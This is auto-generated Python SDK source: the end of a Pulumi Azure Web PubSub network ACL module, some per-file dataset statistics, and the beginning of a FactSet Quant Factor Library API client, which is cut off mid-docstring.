virtual_network_name=example_virtual_network.name,
address_prefixes=["10.5.2.0/24"],
enforce_private_link_endpoint_network_policies=True)
example_endpoint = azure.privatelink.Endpoint("exampleEndpoint",
resource_group_name=example_resource_group.name,
location=example_resource_group.location,
subnet_id=example_subnet.id,
private_service_connection=azure.privatelink.EndpointPrivateServiceConnectionArgs(
name="psc-sig-test",
is_manual_connection=False,
private_connection_resource_id=example_service.id,
subresource_names=["webpubsub"],
))
example_network_acl = azure.webpubsub.NetworkAcl("exampleNetworkAcl",
web_pubsub_id=example_service.id,
default_action="Allow",
public_network=azure.webpubsub.NetworkAclPublicNetworkArgs(
denied_request_types=["ClientConnection"],
),
private_endpoints=[azure.webpubsub.NetworkAclPrivateEndpointArgs(
id=example_endpoint.id,
denied_request_types=[
"RESTAPI",
"ClientConnection",
],
)],
opts=pulumi.ResourceOptions(depends_on=[azurerm_private_endpoint["test"]]))
```
## Import
Network ACLs for a Web Pubsub service can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:webpubsub/networkAcl:NetworkAcl example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.SignalRService/webPubSub/webpubsub1
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] default_action: The default action to control the network access when no other rule matches. Possible values are `Allow` and `Deny`. Defaults to `Deny`.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['NetworkAclPrivateEndpointArgs']]]] private_endpoints: A `private_endpoint` block as defined below.
:param pulumi.Input[pulumi.InputType['NetworkAclPublicNetworkArgs']] public_network: A `public_network` block as defined below.
:param pulumi.Input[str] web_pubsub_id: The ID of the Web Pubsub service. Changing this forces a new resource to be created.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: NetworkAclArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages the Network ACL for a Web Pubsub.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="east us")
example_service = azure.webpubsub.Service("exampleService",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
sku="Standard_S1",
capacity=1)
example_virtual_network = azure.network.VirtualNetwork("exampleVirtualNetwork",
resource_group_name=example_resource_group.name,
location=example_resource_group.location,
address_spaces=["10.5.0.0/16"])
example_subnet = azure.network.Subnet("exampleSubnet",
resource_group_name=example_resource_group.name,
virtual_network_name=example_virtual_network.name,
address_prefixes=["10.5.2.0/24"],
enforce_private_link_endpoint_network_policies=True)
example_endpoint = azure.privatelink.Endpoint("exampleEndpoint",
resource_group_name=example_resource_group.name,
location=example_resource_group.location,
subnet_id=example_subnet.id,
private_service_connection=azure.privatelink.EndpointPrivateServiceConnectionArgs(
name="psc-sig-test",
is_manual_connection=False,
private_connection_resource_id=example_service.id,
subresource_names=["webpubsub"],
))
example_network_acl = azure.webpubsub.NetworkAcl("exampleNetworkAcl",
web_pubsub_id=example_service.id,
default_action="Allow",
public_network=azure.webpubsub.NetworkAclPublicNetworkArgs(
denied_request_types=["ClientConnection"],
),
private_endpoints=[azure.webpubsub.NetworkAclPrivateEndpointArgs(
id=example_endpoint.id,
denied_request_types=[
"RESTAPI",
"ClientConnection",
],
)],
opts=pulumi.ResourceOptions(depends_on=[azurerm_private_endpoint["test"]]))
```
## Import
Network ACLs for a Web Pubsub service can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:webpubsub/networkAcl:NetworkAcl example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.SignalRService/webPubSub/webpubsub1
```
:param str resource_name: The name of the resource.
:param NetworkAclArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(NetworkAclArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
default_action: Optional[pulumi.Input[str]] = None,
private_endpoints: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['NetworkAclPrivateEndpointArgs']]]]] = None,
public_network: Optional[pulumi.Input[pulumi.InputType['NetworkAclPublicNetworkArgs']]] = None,
web_pubsub_id: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = NetworkAclArgs.__new__(NetworkAclArgs)
__props__.__dict__["default_action"] = default_action
__props__.__dict__["private_endpoints"] = private_endpoints
if public_network is None and not opts.urn:
raise TypeError("Missing required property 'public_network'")
__props__.__dict__["public_network"] = public_network
if web_pubsub_id is None and not opts.urn:
raise TypeError("Missing required property 'web_pubsub_id'")
__props__.__dict__["web_pubsub_id"] = web_pubsub_id
super(NetworkAcl, __self__).__init__(
'azure:webpubsub/networkAcl:NetworkAcl',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
default_action: Optional[pulumi.Input[str]] = None,
private_endpoints: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['NetworkAclPrivateEndpointArgs']]]]] = None,
public_network: Optional[pulumi.Input[pulumi.InputType['NetworkAclPublicNetworkArgs']]] = None,
web_pubsub_id: Optional[pulumi.Input[str]] = None) -> 'NetworkAcl':
"""
Get an existing NetworkAcl resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] default_action: The default action to control the network access when no other rule matches. Possible values are `Allow` and `Deny`. Defaults to `Deny`.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['NetworkAclPrivateEndpointArgs']]]] private_endpoints: A `private_endpoint` block as defined below.
:param pulumi.Input[pulumi.InputType['NetworkAclPublicNetworkArgs']] public_network: A `public_network` block as defined below.
:param pulumi.Input[str] web_pubsub_id: The ID of the Web Pubsub service. Changing this forces a new resource to be created.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _NetworkAclState.__new__(_NetworkAclState)
__props__.__dict__["default_action"] = default_action
__props__.__dict__["private_endpoints"] = private_endpoints
__props__.__dict__["public_network"] = public_network
__props__.__dict__["web_pubsub_id"] = web_pubsub_id
return NetworkAcl(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="defaultAction")
def default_action(self) -> pulumi.Output[Optional[str]]:
"""
The default action to control the network access when no other rule matches. Possible values are `Allow` and `Deny`. Defaults to `Deny`.
"""
return pulumi.get(self, "default_action")
@property
@pulumi.getter(name="privateEndpoints")
def private_endpoints(self) -> pulumi.Output[Optional[Sequence['outputs.NetworkAclPrivateEndpoint']]]:
"""
A `private_endpoint` block as defined below.
"""
return pulumi.get(self, "private_endpoints")
@property
@pulumi.getter(name="publicNetwork")
def public_network(self) -> pulumi.Output['outputs.NetworkAclPublicNetwork']:
"""
A `public_network` block as defined below.
"""
return pulumi.get(self, "public_network")
@property
@pulumi.getter(name="webPubsubId")
def web_pubsub_id(self) -> pulumi.Output[str]:
"""
The ID of the Web Pubsub service. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "web_pubsub_id")
| 48.33995
| 200
| 0.671167
| 2,116
| 19,481
| 5.918242
| 0.111531
| 0.060608
| 0.029865
| 0.026352
| 0.856185
| 0.843328
| 0.838058
| 0.825042
| 0.813463
| 0.786712
| 0
| 0.006759
| 0.232996
| 19,481
| 402
| 201
| 48.460199
| 0.831348
| 0.439249
| 0
| 0.627119
| 1
| 0
| 0.163436
| 0.063384
| 0
| 0
| 0
| 0
| 0
| 1
| 0.152542
| false
| 0.00565
| 0.039548
| 0
| 0.282486
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c55e9a96c356ceb08a9adbd64c4f6d7507461fc7
| 65,327
|
py
|
Python
|
code/python/FactSetQuantFactorLibrary/v1/fds/sdk/FactSetQuantFactorLibrary/api/helper_api.py
|
factset/enterprise-sdk
|
3fd4d1360756c515c9737a0c9a992c7451d7de7e
|
[
"Apache-2.0"
] | 6
|
2022-02-07T16:34:18.000Z
|
2022-03-30T08:04:57.000Z
|
code/python/FactSetQuantFactorLibrary/v1/fds/sdk/FactSetQuantFactorLibrary/api/helper_api.py
|
factset/enterprise-sdk
|
3fd4d1360756c515c9737a0c9a992c7451d7de7e
|
[
"Apache-2.0"
] | 2
|
2022-02-07T05:25:57.000Z
|
2022-03-07T14:18:04.000Z
|
code/python/FactSetQuantFactorLibrary/v1/fds/sdk/FactSetQuantFactorLibrary/api/helper_api.py
|
factset/enterprise-sdk
|
3fd4d1360756c515c9737a0c9a992c7451d7de7e
|
[
"Apache-2.0"
] | null | null | null |
"""
FactSet Quant Factor Library API
The FactSet FactSet Quant Factor Library (QFL) API helps to detect investment themes across global equity markets, incorporate ideas into your portfolio construction process, and transform raw data into actionable intelligence. Over 2000+ items spanning Factor Groups in- * Classification and Reference Data - Asset Data, Country, Industry, and Size * Market - Liquidity, Market Sensitivity, Momentum, Technical, Volatility * Core Fundamentals - Efficiency, Growth, Management, Profitability, Quality, Solvency, Value * Macro and Cross Asset - Commodity, FX Sensitivity, Debt, Economic * Alternative - Analyst Sentiment, Corporate Governance, Crowding, Insider Activity. # noqa: E501
The version of the OpenAPI document: 1.0.0
Contact: api@factset.com
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from multiprocessing.pool import ApplyResult
import typing
from fds.sdk.FactSetQuantFactorLibrary.api_client import ApiClient, Endpoint as _Endpoint
from fds.sdk.FactSetQuantFactorLibrary.model_utils import ( # noqa: F401
check_allowed_values,
check_validations,
date,
datetime,
file_type,
none_type,
validate_and_convert_types
)
from fds.sdk.FactSetQuantFactorLibrary.exceptions import ApiException
from fds.sdk.FactSetQuantFactorLibrary.model.library_request import LibraryRequest
from fds.sdk.FactSetQuantFactorLibrary.model.library_response import LibraryResponse
class HelperApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
self.get_factor_library_endpoint = _Endpoint(
settings={
'response_type': (
{ 200: (LibraryResponse,), },
None
),
'auth': [
'FactSetApiKey',
'FactSetOAuth2'
],
'endpoint_path': '/factset-quant-factor-library/v1/library',
'operation_id': 'get_factor_library',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'factors',
'factor_groups',
],
'required': [],
'nullable': [
],
'enum': [
],
'validation': [
'factors',
'factor_groups',
]
},
root_map={
'validations': {
('factors',): {
'max_items': 20,
'min_items': 1,
},
('factor_groups',): {
'max_items': 5,
'min_items': 1,
},
},
'allowed_values': {
},
'openapi_types': {
'factors':
([str],),
'factor_groups':
([str],),
},
'attribute_map': {
'factors': 'factors',
'factor_groups': 'factorGroups',
},
'location_map': {
'factors': 'query',
'factor_groups': 'query',
},
'collection_format_map': {
'factors': 'csv',
'factor_groups': 'csv',
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client
)
self.get_factor_library_list_endpoint = _Endpoint(
settings={
'response_type': (
{ 200: (LibraryResponse,), },
None
),
'auth': [
'FactSetApiKey',
'FactSetOAuth2'
],
'endpoint_path': '/factset-quant-factor-library/v1/library',
'operation_id': 'get_factor_library_list',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'library_request',
],
'required': [
'library_request',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'library_request':
(LibraryRequest,),
},
'attribute_map': {
},
'location_map': {
'library_request': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client
)
@staticmethod
def apply_kwargs_defaults(kwargs, return_http_data_only, async_req):
kwargs["async_req"] = async_req
kwargs["_return_http_data_only"] = return_http_data_only
kwargs["_preload_content"] = kwargs.get("_preload_content", True)
kwargs["_request_timeout"] = kwargs.get("_request_timeout", None)
kwargs["_check_input_type"] = kwargs.get("_check_input_type", True)
kwargs["_check_return_type"] = kwargs.get("_check_return_type", True)
kwargs["_spec_property_naming"] = kwargs.get("_spec_property_naming", False)
kwargs["_content_type"] = kwargs.get("_content_type")
kwargs["_host_index"] = kwargs.get("_host_index")
def get_factor_library(
self,
**kwargs
) -> LibraryResponse:
"""Retrieve a list of all available factors with relevant meta data. # noqa: E501
Fetch the list of all available factors and related meta data. # noqa: E501
This method makes a synchronous HTTP request. Returns the http data only
Keyword Args:
factors ([str]): Array of individual Factor Items requested for the library endpoint. Use the factorGroups parameter to pull for a full list of factors based off the input group. . [optional]
factor_groups ([str]): Fetch a collection of Factors that fall within one of the below \"groups\". For example, resting factorGroup=Momentum will return all factors under the momentum group. To know which items are available in each group use the /library endpoint.***<p>factor groups limit** = 5 factor groups per request* ### Classification and Reference |Group|Descriptions| |---|---| |Asset_Data|Easily input security-level metadata into your quantitative research process. Common metrics used include Days Since Report, Days to Report, ADR Flag, and Minimum Lot Size. Integrate variables from FactSet Reference, FactSet Fundamentals, and FactSet Estimates databases to impose portfolio constraints and access general reference data.| |Country|Evaluate securities based on the countries in which they have the highest exposure. Analyze company-level exposures across various countries and measure how concentrated a firm’s business is within their countries of operation. Metrics are derived from FactSet Reference and FactSet Geographic Revenue Exposure (GeoRev) databases and include Country Exposure, Country of Incorporation, and Country of Risk.| |Industry|Classify securities based on the industries in which they generate the majority of their revenues. Incorporate variables from the FactSet Revere Business and Industry Classification System (RBICS) database to measure how concentrated a firm’s business is within the industries they operate and across various sub-sectors. Common metrics include Industry Classifications, Industry Exposures, and Industry Concentration.| |Size|Assess how large or small a company is relative to industry peers. Create size buckets and clarify the systematic portion of company returns using variables from FactSet Prices, FactSet RBICS, FactSet Fundamentals, and FactSet Estimates. Common metrics include Size Classification, Enterprise Value, and Market Share.| ### Market Factors |Group|Descriptions| |---|---| |Liquidity|Assess how investible a security is, as well as the potential market impact of a trade using signals built off pricing and volume data from FactSet Prices. Integrate factors as components into your alpha models to evaluate systematic risk or input them into your portfolio construction models to dictate how much of an asset can be bought or sold based on liquidity levels. Common metrics include Average Dollars Traded, Share Turnover, and Bid Ask Spread.| |Market Sensitivity|Clarify the common variations in stock returns attributable to the performance of their local market indices. Leverage regressions performed between security-level and market-index returns across different return horizons and methodologies. Metrics are derived from FactSet Prices and include Beta R-Squared, Up Market Beta, and Down Market Beta.| |Momentum|Analyze the historical momentum of a security and uncover how each underlying data item, calculation, and horizon can be meaningful in different situations. Metrics are derived from FactSet Prices and include 52W Position, Return Momentum, and Velocity.| |Technical|Forecast the direction of future price movements based on historical market data and leverage heuristic or pattern-based signals from FactSet Prices. Common metrics include Average True Range, Ulcer Performance Index, and Money Flow Volume.| |Volatility|Measure the uncertainty in asset price movements with indicators from the FactSet Prices database. Capture various forms of uncertainty by employing statistical calculations on security performance data. Common metrics include Return Volatility, Semivariance, and Turbulence.| ### Core Fundamentals |Group|Descriptions| |---|---| |Efficiency|Leverage core financial data to determine how effectively a company uses its assets, collects payments, and operates its business. Most variables are measured as turnover ratios and include changes over time to provide transparency into the efficiency of each business process. Metrics are derived from FactSet Fundamentals and FactSet Estimates and include Asset Turnover, Receivables Turnover, and Cash Conversion Cycle| |Growth|Measure a company’s ability to grow faster than its peers. Compare the future expected growth of a company with its historical growth and view growth rates adjusted for stability. Integrate variables from FactSet RBICS, FactSet Fundamentals, and FactSet Estimates to analyze growth rates over multiple horizons including Market Share, Sales, and EPS Growth| |Management|Gain insight into how management finances their business and the decisions they make that impact the core financial statements. These choices are reflected in changes to total debt or equity, the overall size of the balance sheet, and decisions around the accounting methods used. Metrics are derived from FactSet Fundamentals and FactSet Estimates and include Capital Expenditures (CAPEX) Growth, Equity Buyback Ratio, and Depreciation & Amortization Variability| |Profitability|Evaluate a company’s ability to generate income relative to its revenue or balance sheet metrics. Identify lucrative businesses relative to their industry, region, and size profile. Metrics are derived from FactSet Fundamentals and FactSet Estimates and include Return on Assets, Return on Invested Capital Change, and Return on Total Equity |Quality|Understand the overall financial health and quality of a company’s business. Use historical data from FactSet Fundamentals to analyze balance sheet health, stability of earnings and profit margins, variability in cash flows, and trends that look beyond headline financial metrics. Common metrics include Cash Earnings Ratio Variability, Revenue Stability, and Accruals Ratios. Composite quality scores (i.e., the Piotroski F-Score, Beneish M-Score, and Altman Z-Score) and their underlying components are also available as individual metrics.| |Solvency|Measure a company’s ability to meet their short- and long-term financial obligations and determine the degree of leverage employed to run their business. Incorporate financial ratios from FactSet Fundamentals and FactSet Estimates to quantify liability or debt obligation relative to earnings, cash flows, equities, or items from the asset side of the balance sheet. Common metrics include Current Ratio, Current Asset Liquidity, and Debt to Equity Change.| |Value|Quickly determine how cheap or expensive a company is based on common security-level characteristics from FactSet Prices, FactSet Fundamentals, and FactSet Estimates. Apply factors as an intersection between other factors for a more customized analysis, such as finding the cheapest stocks among the highest quality companies. Common metrics include Earnings Yield, Book to Price, and Revenue to Enterprise Value.| ### Macro and Cross-Asset |Group|Descriptions| |---|---| |Commodity|Quantify the impact movements in the commodity markets have on equity prices. Metrics are derived from FactSet Prices and allow you to measure company-level exposure to commodities such as Gold, Crude Oil, Coffee, and Live Cattle.| |FX_Sensitivity| Analyze security-level sensitivity to fluctuations in the currency markets. Metrics are derived from FactSet Prices and allow you to identify company exposures to currencies such as USD, EUR, JPY, and CNY. |Debt|Uncover details related to company debt through issuer-level factor exposures. Use the FactSet Fixed Income Prices & Derived Analytics database to aggregate metrics at the company level. Common metrics include Effective Duration, Option Adjusted Spread, and Yield to Worst.| |Economic|Capture daily security exposures to leading economic indicator forecasts. Leverage the Quant Factor Library’s detailed country exposure model to attribute economic measures to individual companies. Metrics are derived from FactSet Economic Estimates and include Real GPD Growth, Industrial Production Growth, Core CPI Inflation, and Policy Rates. ### Alternative |Group|Descriptions| |---|---| |Analyst_Sentiment|Analyze a security’s outlook from the perspective of a sell-side research analyst. Leverage consensus estimates data from the FactSet Estimates database to analyze the directional change in estimate revisions for various financial statement items and time periods. Common metrics include Sales Estimate Revisions, Free Cash Flow Estimate Revisions, and Robust Estimate Revisions.| |Corporate_Governance|Identify companies with strong corporate governance. Analyze the profile of a company’s management and board based on tenure, diversity, compensation incentives, and more factors from the FactSet People database. Common metrics include Management - Average Age, Board - Activist Member, and Executives - Average Bonus.| |Crowding|Understand the degree to which investors own, purchase, or sell a security. View characteristics of each investor’s profile and characterize crowding from passive, active, institutional, ETF, and hedge fund investors. Use metrics from FactSet Ownership, FactSet Prices, and FactSet Fundamentals to help identify potential effects of crowding such as whether certain investor types are acquiring or divesting from a given security. Common metrics include Active Buyer Percent of Portfolio Change, ETF Days to Liquidate, and Hedge Fund Percent Outstanding.| |Insider_Activity|Measure the degree to which insiders own, purchase, or sell their company’s stock. Analyze the sentiment of those with access to material non-public information or determine how the amount of insider ownership may impact management’s key business decisions. Metrics are derived from FactSet Ownership and include Insider Percent Outstanding, Insider Number of Buys, and Insider Seller Position Change. |ESG|Analyze Environmental, Social and Governance (ESG) behavior, which are aggregated and categorized into continuously updated, material ESG scores to uncover risks and opportunities from companies. Truvalue Labs focuses on company ESG behavior from external sources and includes both positive and negative events that go beyond traditional sources of ESG risk data. . [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
LibraryResponse
Response Object
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=False)
return self.get_factor_library_endpoint.call_with_http_info(**kwargs)
def get_factor_library_with_http_info(
self,
**kwargs
) -> typing.Tuple[LibraryResponse, int, typing.MutableMapping]:
"""Retrieve a list of all available factors with relevant meta data. # noqa: E501
Fetch the list of all available factors and related meta data. # noqa: E501
This method makes a synchronous HTTP request. Returns http data, http status and headers
Keyword Args:
factors ([str]): Array of individual Factor Items requested for the library endpoint. Use the factorGroups parameter to pull for a full list of factors based off the input group. . [optional]
factor_groups ([str]): Fetch a collection of Factors that fall within one of the below \"groups\". For example, resting factorGroup=Momentum will return all factors under the momentum group. To know which items are available in each group use the /library endpoint.***<p>factor groups limit** = 5 factor groups per request* ### Classification and Reference |Group|Descriptions| |---|---| |Asset_Data|Easily input security-level metadata into your quantitative research process. Common metrics used include Days Since Report, Days to Report, ADR Flag, and Minimum Lot Size. Integrate variables from FactSet Reference, FactSet Fundamentals, and FactSet Estimates databases to impose portfolio constraints and access general reference data.| |Country|Evaluate securities based on the countries in which they have the highest exposure. Analyze company-level exposures across various countries and measure how concentrated a firm’s business is within their countries of operation. Metrics are derived from FactSet Reference and FactSet Geographic Revenue Exposure (GeoRev) databases and include Country Exposure, Country of Incorporation, and Country of Risk.| |Industry|Classify securities based on the industries in which they generate the majority of their revenues. Incorporate variables from the FactSet Revere Business and Industry Classification System (RBICS) database to measure how concentrated a firm’s business is within the industries they operate and across various sub-sectors. Common metrics include Industry Classifications, Industry Exposures, and Industry Concentration.| |Size|Assess how large or small a company is relative to industry peers. Create size buckets and clarify the systematic portion of company returns using variables from FactSet Prices, FactSet RBICS, FactSet Fundamentals, and FactSet Estimates. Common metrics include Size Classification, Enterprise Value, and Market Share.| ### Market Factors |Group|Descriptions| |---|---| |Liquidity|Assess how investible a security is, as well as the potential market impact of a trade using signals built off pricing and volume data from FactSet Prices. Integrate factors as components into your alpha models to evaluate systematic risk or input them into your portfolio construction models to dictate how much of an asset can be bought or sold based on liquidity levels. Common metrics include Average Dollars Traded, Share Turnover, and Bid Ask Spread.| |Market Sensitivity|Clarify the common variations in stock returns attributable to the performance of their local market indices. Leverage regressions performed between security-level and market-index returns across different return horizons and methodologies. Metrics are derived from FactSet Prices and include Beta R-Squared, Up Market Beta, and Down Market Beta.| |Momentum|Analyze the historical momentum of a security and uncover how each underlying data item, calculation, and horizon can be meaningful in different situations. Metrics are derived from FactSet Prices and include 52W Position, Return Momentum, and Velocity.| |Technical|Forecast the direction of future price movements based on historical market data and leverage heuristic or pattern-based signals from FactSet Prices. Common metrics include Average True Range, Ulcer Performance Index, and Money Flow Volume.| |Volatility|Measure the uncertainty in asset price movements with indicators from the FactSet Prices database. Capture various forms of uncertainty by employing statistical calculations on security performance data. Common metrics include Return Volatility, Semivariance, and Turbulence.| ### Core Fundamentals |Group|Descriptions| |---|---| |Efficiency|Leverage core financial data to determine how effectively a company uses its assets, collects payments, and operates its business. Most variables are measured as turnover ratios and include changes over time to provide transparency into the efficiency of each business process. Metrics are derived from FactSet Fundamentals and FactSet Estimates and include Asset Turnover, Receivables Turnover, and Cash Conversion Cycle| |Growth|Measure a company’s ability to grow faster than its peers. Compare the future expected growth of a company with its historical growth and view growth rates adjusted for stability. Integrate variables from FactSet RBICS, FactSet Fundamentals, and FactSet Estimates to analyze growth rates over multiple horizons including Market Share, Sales, and EPS Growth| |Management|Gain insight into how management finances their business and the decisions they make that impact the core financial statements. These choices are reflected in changes to total debt or equity, the overall size of the balance sheet, and decisions around the accounting methods used. Metrics are derived from FactSet Fundamentals and FactSet Estimates and include Capital Expenditures (CAPEX) Growth, Equity Buyback Ratio, and Depreciation & Amortization Variability| |Profitability|Evaluate a company’s ability to generate income relative to its revenue or balance sheet metrics. Identify lucrative businesses relative to their industry, region, and size profile. Metrics are derived from FactSet Fundamentals and FactSet Estimates and include Return on Assets, Return on Invested Capital Change, and Return on Total Equity |Quality|Understand the overall financial health and quality of a company’s business. Use historical data from FactSet Fundamentals to analyze balance sheet health, stability of earnings and profit margins, variability in cash flows, and trends that look beyond headline financial metrics. Common metrics include Cash Earnings Ratio Variability, Revenue Stability, and Accruals Ratios. Composite quality scores (i.e., the Piotroski F-Score, Beneish M-Score, and Altman Z-Score) and their underlying components are also available as individual metrics.| |Solvency|Measure a company’s ability to meet their short- and long-term financial obligations and determine the degree of leverage employed to run their business. Incorporate financial ratios from FactSet Fundamentals and FactSet Estimates to quantify liability or debt obligation relative to earnings, cash flows, equities, or items from the asset side of the balance sheet. Common metrics include Current Ratio, Current Asset Liquidity, and Debt to Equity Change.| |Value|Quickly determine how cheap or expensive a company is based on common security-level characteristics from FactSet Prices, FactSet Fundamentals, and FactSet Estimates. Apply factors as an intersection between other factors for a more customized analysis, such as finding the cheapest stocks among the highest quality companies. Common metrics include Earnings Yield, Book to Price, and Revenue to Enterprise Value.| ### Macro and Cross-Asset |Group|Descriptions| |---|---| |Commodity|Quantify the impact movements in the commodity markets have on equity prices. Metrics are derived from FactSet Prices and allow you to measure company-level exposure to commodities such as Gold, Crude Oil, Coffee, and Live Cattle.| |FX_Sensitivity| Analyze security-level sensitivity to fluctuations in the currency markets. Metrics are derived from FactSet Prices and allow you to identify company exposures to currencies such as USD, EUR, JPY, and CNY. |Debt|Uncover details related to company debt through issuer-level factor exposures. Use the FactSet Fixed Income Prices & Derived Analytics database to aggregate metrics at the company level. Common metrics include Effective Duration, Option Adjusted Spread, and Yield to Worst.| |Economic|Capture daily security exposures to leading economic indicator forecasts. Leverage the Quant Factor Library’s detailed country exposure model to attribute economic measures to individual companies. Metrics are derived from FactSet Economic Estimates and include Real GPD Growth, Industrial Production Growth, Core CPI Inflation, and Policy Rates. ### Alternative |Group|Descriptions| |---|---| |Analyst_Sentiment|Analyze a security’s outlook from the perspective of a sell-side research analyst. Leverage consensus estimates data from the FactSet Estimates database to analyze the directional change in estimate revisions for various financial statement items and time periods. Common metrics include Sales Estimate Revisions, Free Cash Flow Estimate Revisions, and Robust Estimate Revisions.| |Corporate_Governance|Identify companies with strong corporate governance. Analyze the profile of a company’s management and board based on tenure, diversity, compensation incentives, and more factors from the FactSet People database. Common metrics include Management - Average Age, Board - Activist Member, and Executives - Average Bonus.| |Crowding|Understand the degree to which investors own, purchase, or sell a security. View characteristics of each investor’s profile and characterize crowding from passive, active, institutional, ETF, and hedge fund investors. Use metrics from FactSet Ownership, FactSet Prices, and FactSet Fundamentals to help identify potential effects of crowding such as whether certain investor types are acquiring or divesting from a given security. Common metrics include Active Buyer Percent of Portfolio Change, ETF Days to Liquidate, and Hedge Fund Percent Outstanding.| |Insider_Activity|Measure the degree to which insiders own, purchase, or sell their company’s stock. Analyze the sentiment of those with access to material non-public information or determine how the amount of insider ownership may impact management’s key business decisions. Metrics are derived from FactSet Ownership and include Insider Percent Outstanding, Insider Number of Buys, and Insider Seller Position Change. |ESG|Analyze Environmental, Social and Governance (ESG) behavior, which are aggregated and categorized into continuously updated, material ESG scores to uncover risks and opportunities from companies. Truvalue Labs focuses on company ESG behavior from external sources and includes both positive and negative events that go beyond traditional sources of ESG risk data. . [optional]
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
Returns:
LibraryResponse
Response Object
int
Http Status Code
dict
Dictionary of the response headers
"""
self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=False)
return self.get_factor_library_endpoint.call_with_http_info(**kwargs)
def get_factor_library_async(
self,
**kwargs
) -> "ApplyResult[LibraryResponse]":
"""Retrieve a list of all available factors with relevant meta data. # noqa: E501
Fetch the list of all available factors and related meta data. # noqa: E501
This method makes a asynchronous HTTP request. Returns the http data, wrapped in ApplyResult
Keyword Args:
factors ([str]): Array of individual Factor Items requested for the library endpoint. Use the factorGroups parameter to pull for a full list of factors based off the input group. . [optional]
